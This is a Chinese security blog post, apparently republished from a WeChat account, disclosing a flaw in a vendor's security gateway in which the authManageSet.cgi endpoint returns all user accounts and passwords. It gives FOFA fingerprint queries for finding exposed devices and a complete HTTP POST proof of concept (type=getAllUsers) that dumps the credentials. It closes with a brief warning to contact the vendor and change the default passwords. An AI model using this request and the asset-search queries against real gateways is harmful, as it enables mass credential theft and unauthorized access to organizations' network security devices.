【1day】某神authManageSet.cgi接口泄露账号密码

admin

105039
文章

87
评论

2023年12月12日14:38:36评论31 views字数 609阅读2分1秒阅读模式

师傅们，我来水一篇文章，最近出了某神的authManageSet.cgi接口泄露账号密码，直接构造特定的数据包可直接发现账号密码。

一.资产

fofa语法：

body="sec_gate_image/login_02.gif"

fid="ldb0WVBlAgZloMw9AAge0A=="

二.直接上POC

POST /cgi-bin/authUser/authManageSet.cgi HTTP/1.1Host: ip:portCache-Control: max-age=0Upgrade-Insecure-Requests: 1Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 77
type=getAllUsers&_search=false&nd=1645000391264&rows=-1&page=1&sidx=&sord=asc

三.复现过程

【1day】某神authManageSet.cgi接口泄露账号密码

发现该账号密码还是该产品的默认账号密码，使用了该产品的师傅们记得及时联系厂商修复以及更改默认账号密码！

四.总结

继续为我国网络安全事业奋斗！

原文始发于微信公众号（网络安全007）：【1day】某神authManageSet.cgi接口泄露账号密码

 点赞

https://cn-sec.com/archives/2289972.html 复制链接复制链接

左青龙

微信扫一扫

右白虎

微信扫一扫

安全漏洞

网络安全
账号密码
1day
authmanageset
authManageSet.cgi

【漏洞预警】Git 远程命令执行漏洞 (CVE-2024-32002)

D-Link NAS 未授权RCE

某浏览系统存在延时注入

【漏洞复现】cockpit系统assetsmanager/upload接口存在文件上传漏洞 | 附poc

Weblogic任意文件上传漏洞

【已复现】(CVE-2023-39361)Cacti 未授权SQL注入漏洞

【已复现】致远OA前台任意用户密码修改漏洞

【漏洞复现】Juniper JunOS SRX EX 远程命令执行漏洞 CVE-2023-36844

CVE-2022-47966 SAML RCE

Openfire 身份认证绕过漏洞复现

本文由 admin 发表于 2023年12月12日14:38:36

转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出)：
【1day】某神authManageSet.cgi接口泄露账号密码https://cn-sec.com/archives/2289972.html

上一篇

漏洞预警 | OpenCMS XXE漏洞

下一篇

ATT&CK红队评估实战靶场(三)

逻辑漏洞的挖掘与防范(一)

TKDD 2023｜综述：图挖掘技术在网络安全中的应用

教育行业渗透打点

Shiro 反序列化漏洞靶场

广告位招租
广告位招租1
广告位招租
广告位招租2

发表评论
匿名网友填写信息

昵称

邮箱

网址

取消

Δ

【腾讯云】产品特惠热卖中
【腾讯云】云服务器、云数据库、COS、CDN、短信等云产品特惠热卖中

本类热门文章

TurboGate邮件网关漏洞合集 49,162 views 0

斗鱼TV两处功能平行权限漏洞 16,795 views 0

666个政府网站sql注入漏洞的注入点 15,042 views 0

帆软报表 v8.0 任意文件读取漏洞 CNVD-2018-04757 8,222 views 1

史上最强搜索神器章鱼搜索xss跨站 7,588 views 0

通用型正方教务（通杀各版本）存在注入（不需登陆）+获得webshell+提权内网漫游 6,565 views 0

【漏洞预警】奇安信vpn存在未授权管理用户遍历及任意账号密码修改，已复现 6,482 views 2

安全漏洞

【漏洞预警】Git 远程命令执行漏洞 (CVE-2024-32002) 05/20 0 views

D-Link NAS 未授权RCE 05/19 40 views

某浏览系统存在延时注入 05/19 20 views

【漏洞复现】cockpit系统assetsmanager/upload接口存在文件上传漏洞 | 附poc 05/19 23 views

Weblogic任意文件上传漏洞 05/19 18 views

【已复现】(CVE-2023-39361)Cacti 未授权SQL注入漏洞 05/19 9 views

【已复现】致远OA前台任意用户密码修改漏洞 05/19 14 views

【漏洞复现】Juniper JunOS SRX EX 远程命令执行漏洞 CVE-2023-36844 05/19 9 views

CVE-2022-47966 SAML RCE 05/19 7 views

Openfire 身份认证绕过漏洞复现 05/19 7 views

热门标签

漏洞 github 文件 payload php web xss 攻击信息安全 python windows 勒索软件 http 攻击者网络攻击漏洞复现 com 安全服务器远程代码执行漏洞 app 应用程序 https 网络人工智能 shellcode sql 身份验证 shell 代码 linux ip cwe 数据安全密码 microsoft 恶意软件 cve 工具 rce 网络安全公众号 ctf 未分类用户漏洞预警渗透测试 java 黑客数据泄露

最新文章

基于风险分析的信息系统等级测评 05/20 0 views

苹果设备成黑客攻击目标 Atomic Stealer列首位 05/20 0 views

DevOps实践：通过云效实现hexo自动构建部署发布 05/20 1 views

Android逆向学习68——Zygote详解 05/20 1 views

12秒窃走2500万美元加密货币，麻省理工毕业的黑客两兄弟被捕 05/20 1 views

让x64dbg支持python脚本 05/20 0 views

CNVD漏洞周报2024年第20期 05/20 2 views

大家喜欢

669个大学网站都有注入点 4305/01
【工具】Awvs14.7.220401065|可自测Spring4Shell漏洞 2304/03
信息安全工程师教程第2版（文末附电子版下载） 1709/07
Cobalt Strike 4.4 (August 04, 2021)发布 1308/26
正方教务管理系统最新版无条件注入&GetShell 1201/01
Acunetix14.x全版本通杀破解补丁 1012/17
Android逆向练习1 跳过签名验证 901/18

关于本站

CN-SEC.COM中文网

聚合网络安全,存储安全技术文章,融合安全最新讯息

文章107686 留言 549 访客17458514

CN-SEC 中文网
网站概况[CN-SEC 中文网]

文章107686

分类47

标签117207

留言549

链接0

浏览17458514

今日21

本周21

运行2974 天

更新2024-5-20

Copyright © CN-SEC中文网版权所有.

登录找回密码

记住我的登录信息

输入用户名或电子邮件

HP

重置密码链接通过邮箱发送给您

目录

在线咨询

13688888888

8888 QQ在线咨询

微信

本页二维码